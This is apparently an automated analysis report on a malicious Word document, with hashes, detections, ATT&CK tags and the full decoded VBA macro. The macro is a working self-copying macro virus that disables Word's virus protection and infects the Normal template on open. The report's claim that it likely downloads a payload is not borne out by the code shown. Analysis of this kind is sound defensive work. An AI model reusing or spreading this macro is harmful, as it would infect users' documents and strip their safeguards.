Office (OLE) malware analysis — malicious · 7aef0b8f2b598dc6

MALICIOUS

Office (OLE)

56.0 KB Created: 2015-07-27 01:38:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 4aff91cb0fe419d7226d8ca24e5dc79a SHA-1: 0dc9c62ec8a2bb25dc09809889ca639007dd2060 SHA-256: 7aef0b8f2b598dc614825bba00e9e3702a83f2635eccd3c9dcacf3399850c4ad

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The Document_Open macro is designed to disable virus protection and overwrite itself with new code, indicating an attempt to evade detection and likely download a secondary payload. The macro code reconstructs the string 'Options.VirusProtection = False' to disable security features.

Heuristics 3

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1441 bytes
SHA-256: `9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Close()Open()Close()Open() Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False EnableCancelKey = wdCancelDisabled Set maci = MacroContainer.VBProject.VBComponents.Item(1) Set macic = maci.codemodule ns$ = Left(macic.Lines(1, 1), 21) Set inf = NormalTemplate: nsi$ = ns$ + "Close()" If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()" Set infc = inf.VBProject.VBComponents Set infi = infc.Item(1) Set infic = infi.codemodule infi.Name = "ThisDocument" For mx = 2 To infc.Count infc.Remove infc.Item(2) Next mx If infic.countlines <> macic.countoflines Then infic.deletelines 1, infic.countoflines For coco = 1 To macic.countoflines infic.insertlines coco, macic.Lines(coco, 1) Next coco infic.replaceline 1, nsi$ End If If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName EnableCancelKey = wdCancelDisabled End Sub 'ThisDocument v 1.0 1999

SHA-256: 9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999

Open this report in the interactive analyzer, or submit your own file for analysis.